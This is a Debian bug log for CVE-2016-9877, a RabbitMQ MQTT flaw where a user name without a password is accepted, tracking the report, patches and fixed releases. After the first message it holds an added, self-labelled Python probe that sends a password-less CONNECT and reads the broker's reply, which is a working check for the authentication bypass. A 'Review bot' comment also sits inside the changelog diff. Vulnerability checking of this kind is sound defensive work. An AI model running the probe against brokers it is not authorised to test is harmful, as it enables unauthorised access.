rabbitmq-server: CVE-2016-9877

Related Vulnerabilities: CVE-2016-9877  

Debian Bug report logs - #849849
rabbitmq-server: CVE-2016-9877


Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Sun, 1 Jan 2017 11:15:01 UTC

Severity: grave

Tags: security, upstream

Found in versions rabbitmq-server/3.6.5-1, rabbitmq-server/3.3.5-1

Fixed in versions rabbitmq-server/3.6.6-1, rabbitmq-server/3.3.5-1.1+deb8u1

Done: Thomas Goirand <zigo@debian.org>

Bug is archived. No further changes may be made.




Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server. (Sun, 01 Jan 2017 11:15:03 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>. (Sun, 01 Jan 2017 11:15:03 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: rabbitmq-server: CVE-2016-9877
Date: Sun, 01 Jan 2017 12:13:30 +0100
Source: rabbitmq-server
Version: 3.6.5-1
Severity: grave
Tags: upstream security
Justification: user security hole

Hi,

the following vulnerability was published for rabbitmq-server.

CVE-2016-9877[0]:
| An issue was discovered in Pivotal RabbitMQ 3.x before 3.5.8 and 3.6.x
| before 3.6.6 and RabbitMQ for PCF 1.5.x before 1.5.20, 1.6.x before
| 1.6.12, and 1.7.x before 1.7.7. MQTT (MQ Telemetry Transport)
| connection authentication with a username/password pair succeeds if an
| existing username is provided but the password is omitted from the
| connection request. Connections that use TLS with a client-provided
| certificate are not affected.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2016-9877
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9877
[1] https://github.com/rabbitmq/rabbitmq-mqtt/pull/98
[2] https://github.com/rabbitmq/rabbitmq-mqtt/issues/96

Please adjust the affected versions in the BTS as needed. I was only
able to check the vulnerability sourcewise for 3.6.5 in unstable;
older versions have not been checked so far.

Regards,
Salvatore
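
The check a practitioner would want at this point, as an added example that is not part of this bug report, of Debian's packaging or of RabbitMQ's own code: a small Python probe that sends one MQTT CONNECT naming an existing user with the Password Flag left clear (user name present, password omitted, exactly the case the CVE text describes) and then reads the CONNACK return code. A return code of 0 from a broker whose named user has a password set reproduces the flaw; 4 (bad user name or password) or 5 (not authorised) means the broker refused the password-less login, which is the post-3.6.6 / 3.5.8 behaviour. The broker host, the user name and the default port 1883 are assumptions supplied by the caller; the packet layout follows MQTT 3.1.1, with the older 3.1 header available through the `protocol` argument for brokers that only accept that protocol name. Plain TCP is used deliberately, since the CVE text says TLS listeners with client certificates are not affected. Run this only against brokers you are authorised to test.

```python
"""Added example (not from the bug report or RabbitMQ): probe a broker for the
CVE-2016-9877 behaviour, a username-only MQTT CONNECT that is accepted.
Host, port and user name are assumptions supplied by the caller."""
import socket
import sys

# Connect-flag bits, identical in MQTT 3.1 and 3.1.1
USERNAME_FLAG = 0x80
PASSWORD_FLAG = 0x40
CLEAN_SESSION = 0x02

# CONNACK return codes (MQTT 3.1.1, section 3.2.2.3)
CONNACK_ACCEPTED = 0
CONNACK_BAD_CREDENTIALS = 4
CONNACK_NOT_AUTHORIZED = 5


def _utf8_field(text):
    """Length-prefixed UTF-8 string as used throughout MQTT."""
    data = text.encode("utf-8")
    return len(data).to_bytes(2, "big") + data


def encode_remaining_length(n):
    """MQTT variable-length 'remaining length' (7 bits per byte, MSB = more)."""
    out = bytearray()
    while True:
        digit, n = n % 128, n // 128
        out.append(digit | 0x80 if n else digit)
        if not n:
            return bytes(out)


def build_connect(username, password=None, client_id="cve-2016-9877-probe",
                  protocol="3.1.1", keepalive=60):
    """Build a CONNECT packet. password=None leaves the Password Flag clear,
    so the broker sees a user name with no password at all (the CVE case)."""
    if protocol == "3.1.1":
        var_header = _utf8_field("MQTT") + b"\x04"
    elif protocol == "3.1":
        var_header = _utf8_field("MQIsdp") + b"\x03"
    else:
        raise ValueError("unsupported MQTT protocol %r" % protocol)
    flags = CLEAN_SESSION | USERNAME_FLAG
    payload = _utf8_field(client_id) + _utf8_field(username)
    if password is not None:
        flags |= PASSWORD_FLAG
        payload += _utf8_field(password)
    var_header += bytes([flags]) + keepalive.to_bytes(2, "big")
    body = var_header + payload
    return b"\x10" + encode_remaining_length(len(body)) + body


def parse_connack(data):
    """Return the CONNACK return code, or raise if the reply is not a CONNACK."""
    if len(data) < 4 or data[0] != 0x20 or data[1] != 0x02:
        raise ValueError("not a CONNACK: %r" % data[:4])
    return data[3]


def interpret(code):
    """Map a CONNACK return code to a verdict for the username-only probe."""
    if code == CONNACK_ACCEPTED:
        return "accepted: username-only login succeeded (CVE-2016-9877 behaviour)"
    if code in (CONNACK_BAD_CREDENTIALS, CONNACK_NOT_AUTHORIZED):
        return "rejected: broker refused the password-less CONNECT (code %d)" % code
    return "inconclusive: CONNACK return code %d" % code


def probe(host, port, username, protocol="3.1.1", timeout=5.0):
    """Send one username-only CONNECT and report how the broker answered."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect(username, None, protocol=protocol))
        reply = sock.recv(4)
    if not reply:
        return "rejected: broker closed the connection without a CONNACK"
    return interpret(parse_connack(reply))


if __name__ == "__main__":
    # Usage: python probe.py BROKER_HOST EXISTING_USER [PORT]
    host, user = sys.argv[1], sys.argv[2]
    port = int(sys.argv[3]) if len(sys.argv) > 3 else 1883  # assumed default MQTT port
    print(probe(host, port, user))
```

An "accepted" verdict is only evidence of the flaw when the named user actually has a password configured; a user deliberately created without one, or a broker that closes the socket instead of answering, needs a second look rather than a conclusion.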



Marked as found in versions rabbitmq-server/3.3.5-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 01 Jan 2017 11:21:06 GMT) (full text, mbox, link).


Added tag(s) pending. Request was from Ondřej Kobližek <ondrej.koblizek@firma.seznam.cz> to control@bugs.debian.org. (Tue, 03 Jan 2017 09:06:03 GMT) (full text, mbox, link).


Message sent on to Salvatore Bonaccorso <carnil@debian.org>:
Bug#849849. (Tue, 03 Jan 2017 09:06:10 GMT) (full text, mbox, link).


Message #12 received at 849849-submitter@bugs.debian.org (full text, mbox, reply):

From: Ondřej Kobližek <ondrej.koblizek@firma.seznam.cz>
To: 849849-submitter@bugs.debian.org
Subject: Bug#849849 marked as pending
Date: Tue, 03 Jan 2017 09:03:32 +0000
tag 849849 pending
thanks

Hello,

Bug #849849 reported by you has been fixed in the Git repository. You can
see the changelog below, and you can check the diff of the fix at:

    http://git.debian.org/?p=openstack/rabbitmq-server.git;a=commitdiff;h=f2574c9

---
commit f2574c9000965f89e9462ffe276792679f3a3903
Author: Ondřej Kobližek <ondrej.koblizek@firma.seznam.cz>
Date:   Mon Jan 2 15:55:07 2017 +0100

    releasing package rabbitmq-server version 3.6.6-1

diff --git a/debian/changelog b/debian/changelog
index 550b29b..ce6823c 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,11 +1,12 @@
-rabbitmq-server (3.6.6-1) UNRELEASED; urgency=medium
+rabbitmq-server (3.6.6-1) unstable; urgency=medium
 
+  [ Ondřej Nový ]
   * Team upload.
-  * New upstream release
+  * New upstream release (Closes: #849849, CVE-2016-9877)
   * d/copyright: Fixed for new release
   * d/ocf: Removed, use upstream one
 
- -- Ondřej Nový <onovy@debian.org>  Thu, 29 Dec 2016 00:49:19 +0100
+ -- Ondřej Kobližek <koblizeko@gmail.com>  Mon, 02 Jan 2017 15:49:03 +0100
 
 rabbitmq-server (3.6.5-1) unstable; urgency=medium
 
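Review bot: the attribution header `[ Ondřej Nový ]` now sits above an entry whose trailer line was changed to `Ondřej Kobližek <koblizeko@gmail.com>`, so the changelog says one person made every change while the signature says another released it; add a second `[ Ondřej Kobližek ]` block for the release, or keep the original trailer, so the attribution matches the trailer. Adding `(Closes: #849849, CVE-2016-9877)` is the convention the bug report asks for, but `New upstream release` on its own tells a reader nothing about what was fixed; a short clause such as "fixes MQTT authentication accepting a user name with no password" would let someone scanning the changelog see the security relevance without resolving the CVE.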



Reply sent to Ondřej Kobližek <koblizeko@gmail.com>:
You have taken responsibility. (Tue, 03 Jan 2017 09:51:08 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Tue, 03 Jan 2017 09:51:08 GMT) (full text, mbox, link).


Message #17 received at 849849-close@bugs.debian.org (full text, mbox, reply):

From: Ondřej Kobližek <koblizeko@gmail.com>
To: 849849-close@bugs.debian.org
Subject: Bug#849849: fixed in rabbitmq-server 3.6.6-1
Date: Tue, 03 Jan 2017 09:50:05 +0000
Source: rabbitmq-server
Source-Version: 3.6.6-1

We believe that the bug you reported is fixed in the latest version of
rabbitmq-server, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 849849@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ondřej Kobližek <koblizeko@gmail.com> (supplier of updated rabbitmq-server package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 02 Jan 2017 15:49:03 +0100
Source: rabbitmq-server
Binary: rabbitmq-server
Architecture: source
Version: 3.6.6-1
Distribution: unstable
Urgency: medium
Maintainer: PKG OpenStack <openstack-devel@lists.alioth.debian.org>
Changed-By: Ondřej Kobližek <koblizeko@gmail.com>
Description:
 rabbitmq-server - AMQP server written in Erlang
Closes: 849849
Changes:
 rabbitmq-server (3.6.6-1) unstable; urgency=medium
 .
   [ Ondřej Nový ]
   * Team upload.
   * New upstream release (Closes: #849849, CVE-2016-9877)
   * d/copyright: Fixed for new release
   * d/ocf: Removed, use upstream one
Checksums-Sha1:
 ef9ba3a151c5eb4a6fd5cf0b5aef987f49bb1be3 2199 rabbitmq-server_3.6.6-1.dsc
 fc6dbb566981e7810c14fe04521bed2acc3f85ca 2471724 rabbitmq-server_3.6.6.orig.tar.xz
 357a29ac1d066a73551024b50dc329af3cea8409 16640 rabbitmq-server_3.6.6-1.debian.tar.xz
Checksums-Sha256:
 c944d1cc53d5c18b6518057bc830e71ef53dcbfddd9f7340a71fed3ae8a1987d 2199 rabbitmq-server_3.6.6-1.dsc
 395689bcf57fd48aed452fcd43ff9a992de40067d3ea5c44e14680d69db7b78e 2471724 rabbitmq-server_3.6.6.orig.tar.xz
 15eed57ad4fa55a54e2e89a1d298cae958c22ef718752794c0993366566e3a76 16640 rabbitmq-server_3.6.6-1.debian.tar.xz
Files:
 a596792473d95713416f746eee10acf9 2199 net extra rabbitmq-server_3.6.6-1.dsc
 138e334d3b5565aa4bce2a1e5b3a913c 2471724 net extra rabbitmq-server_3.6.6.orig.tar.xz
 be407a291e60b38e3a1b0662991fa182 16640 net extra rabbitmq-server_3.6.6-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEPZg8UuuFmAxGpWCQNXMSVZ0eBksFAlhrcL0ACgkQNXMSVZ0e
BkssVA//VIjBzDuHVQnM9L7b6CTvepXrBbw3UufsoHhGz9FzBOrQL9pooMWayc3+
AW+05wPpnz9zoMjXnOGau5Fg8/LlSecx8kd+gmn+Wn+XMeiEabIFmu/x+1BObs2c
V8yMrIrllhPraBf4+Wia+XV7s3n8yzwZvgkKGNwQTmiaNKL0GAlb3jFhm3CmKfFZ
PJTnZU8DE207Y8adDepfCl1P01MrirguPNu5hBBD9Lp8gEl7W/5NozBz//m4OjIB
f54TayhRNovpVyCXCMY6mJ5XAVm+7f3bLA8Azp9wTC3GnU0cFCIxtWx43Hdne6W4
SZBMcNfMiEQY3x5VSgHhP26fmSo5e6vP5Akzw/lXd6/bDmi2lvQLFlBunsIs6Rtu
Q5Zou02hVQ63F5za79SeEeDB+H88U36gzAs2MRTWJe9pq4shteO7isHNvWp9K6Y+
hklvdCfKlfWHTYmfEVt8q/k59FUiJ/l3ZXyo2EfkbGNMADGNxMK8JxiQ2XEJK+a0
5Te1bUalT48Qu6vQCuqjPBNOUiK890BHlkGy5893+Sf0ySKSlb3UTBDtx7Ttzjbg
RNyXl5p/WKKC9XQ7kSqEdOygKjV+p57ZTkrTpmudblhOFSL4pAFui5uDFAE5Aqse
IaKiJe0ENK9uTknyC1i+4CZtklDnuVr8vK/tmKscoWd76tJNr4I=
=EGbz
-----END PGP SIGNATURE-----




Information forwarded to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server. (Fri, 06 Jan 2017 01:03:03 GMT) (full text, mbox, link).


Acknowledgement sent to Balint Reczey <balint@balintreczey.hu>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>. (Fri, 06 Jan 2017 01:03:03 GMT) (full text, mbox, link).


Message #22 received at 849849@bugs.debian.org (full text, mbox, reply):

From: Balint Reczey <balint@balintreczey.hu>
To: 849849@bugs.debian.org
Cc: Salvatore Bonaccorso <carnil@debian.org>, Ondřej Kobližek <ondrej.koblizek@firma.seznam.cz>
Subject: Re: rabbitmq-server: CVE-2016-9877
Date: Fri, 6 Jan 2017 01:59:37 +0100
[Message part 1 (text/plain, inline)]
Hi,

On Sun, 01 Jan 2017 12:13:30 +0100 Salvatore Bonaccorso
<carnil@debian.org> wrote:
...

> 
> Hi,
> 
> the following vulnerability was published for rabbitmq-server.
> 
> CVE-2016-9877[0]:
> | An issue was discovered in Pivotal RabbitMQ 3.x before 3.5.8 and 3.6.x
> | before 3.6.6 and RabbitMQ for PCF 1.5.x before 1.5.20, 1.6.x before
> | 1.6.12, and 1.7.x before 1.7.7. MQTT (MQ Telemetry Transport)
> | connection authentication with a username/password pair succeeds if an
> | existing username is provided but the password is omitted from the
> | connection request. Connections that use TLS with a client-provided
> | certificate are not affected.
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2016-9877
>     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9877
> [1] https://github.com/rabbitmq/rabbitmq-mqtt/pull/98
> [2] https://github.com/rabbitmq/rabbitmq-mqtt/issues/96
> 
> Please adjust the affected versions in the BTS as needed. I was only
> able to check the vulnerability sourcewise for 3.6.5 in unstable;
> older versions have not been checked so far.

I'm attaching a proposed patch for jessie which builds fine but has not
been tested further.

Wheezy is not affected since the vulnerable mqtt plugin is not present.

Cheers,
Balint
[0001-Auth-issue-fix-039a3c22e57bf77b325d19494a9b20cd745f1.patch (text/x-patch, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server. (Wed, 11 Jan 2017 01:45:06 GMT) (full text, mbox, link).


Acknowledgement sent to Thomas Goirand <zigo@debian.org>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>. (Wed, 11 Jan 2017 01:45:06 GMT) (full text, mbox, link).


Message #27 received at 849849@bugs.debian.org (full text, mbox, reply):

From: Thomas Goirand <zigo@debian.org>
To: security@debian.org, 849849@bugs.debian.org
Subject: CVE-2016-9877 / #849849 fix for Jessie
Date: Wed, 11 Jan 2017 02:41:08 +0100
[Message part 1 (text/plain, inline)]
Hi,

I've prepared the package here:
http://sid.gplhost.com/jessie-proposed-updates/rabbitmq-server/

Debdiff is attached (and also available from there). Please allow me to
upload.

Cheers,

Thomas Goirand (zigo)
[rabbitmq-server_3.3.5-1.1+deb8u1.debdiff (text/plain, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#849849; Package src:rabbitmq-server. (Wed, 11 Jan 2017 06:36:03 GMT) (full text, mbox, link).


Acknowledgement sent to Sébastien Delafond <seb@debian.org>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>. (Wed, 11 Jan 2017 06:36:03 GMT) (full text, mbox, link).


Message #32 received at 849849@bugs.debian.org (full text, mbox, reply):

From: Sébastien Delafond <seb@debian.org>
To: Thomas Goirand <zigo@debian.org>
Cc: security@debian.org, 849849@bugs.debian.org
Subject: Re: CVE-2016-9877 / #849849 fix for Jessie
Date: Wed, 11 Jan 2017 07:32:53 +0100
On Jan/11, Thomas Goirand wrote:
> Debdiff is attached (and also available from there). Please allow me
> to upload.

Thanks for your contribution, please upload.

Cheers,

--Seb



Reply sent to Thomas Goirand <zigo@debian.org>:
You have taken responsibility. (Sun, 15 Jan 2017 23:06:20 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Sun, 15 Jan 2017 23:06:20 GMT) (full text, mbox, link).


Message #37 received at 849849-close@bugs.debian.org (full text, mbox, reply):

From: Thomas Goirand <zigo@debian.org>
To: 849849-close@bugs.debian.org
Subject: Bug#849849: fixed in rabbitmq-server 3.3.5-1.1+deb8u1
Date: Sun, 15 Jan 2017 23:02:55 +0000
Source: rabbitmq-server
Source-Version: 3.3.5-1.1+deb8u1

We believe that the bug you reported is fixed in the latest version of
rabbitmq-server, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 849849@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand <zigo@debian.org> (supplier of updated rabbitmq-server package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Wed, 11 Jan 2017 02:17:32 +0100
Source: rabbitmq-server
Binary: rabbitmq-server
Architecture: source all
Version: 3.3.5-1.1+deb8u1
Distribution: jessie-security
Urgency: medium
Maintainer: RabbitMQ Team <packaging@rabbitmq.com>
Changed-By: Thomas Goirand <zigo@debian.org>
Description:
 rabbitmq-server - AMQP server written in Erlang
Closes: 849849
Changes:
 rabbitmq-server (3.3.5-1.1+deb8u1) jessie-security; urgency=medium
 .
   * CVE-2016-9877: apply backported upstream patch (Closes: #849849).
Checksums-Sha1:
 bb6ba8064f84de074a3a5b4e7fa0bad6e2b4083f 1893 rabbitmq-server_3.3.5-1.1+deb8u1.dsc
 f945dd837ce637677b2d80b6fe14ef665233731d 3648221 rabbitmq-server_3.3.5.orig.tar.gz
 01aa51850b772519e041c3ff49d774d25a9fb024 28801 rabbitmq-server_3.3.5-1.1+deb8u1.diff.gz
 dbf7b2c3bf9e16ae6149ad4b9370985149b56d06 4118512 rabbitmq-server_3.3.5-1.1+deb8u1_all.deb
Checksums-Sha256:
 1dd6224ca08aeb7f120ecd01725221fa181312b17e3e749bea36a6a4814cfc1a 1893 rabbitmq-server_3.3.5-1.1+deb8u1.dsc
 7a6bf8af684b2087a1c534ffcd2db1b7c15b137a38bb9f00dfdf0227f69d70c2 3648221 rabbitmq-server_3.3.5.orig.tar.gz
 4978240807984e2d03194168d954463f34395124a571c6ed58f2c1676928c078 28801 rabbitmq-server_3.3.5-1.1+deb8u1.diff.gz
 2c8e448754603787195aa05b80c3c4149768310182cccfcb82b460db7bc7ad0f 4118512 rabbitmq-server_3.3.5-1.1+deb8u1_all.deb
Files:
 dfbaf4ea247eafe3a6675527d01ffe6d 1893 net extra rabbitmq-server_3.3.5-1.1+deb8u1.dsc
 3bf0c4be1aaa6fdb483470aba14a6c81 3648221 net extra rabbitmq-server_3.3.5.orig.tar.gz
 f4e9b1687b8ae8a55253415ef1a70083 28801 net extra rabbitmq-server_3.3.5-1.1+deb8u1.diff.gz
 4f60376adf694ace8772f2eefe0b21bc 4118512 net extra rabbitmq-server_3.3.5-1.1+deb8u1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 07 May 2017 07:28:53 GMT) (full text, mbox, link).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 13:53:33 2019; Machine Name: buxtehude
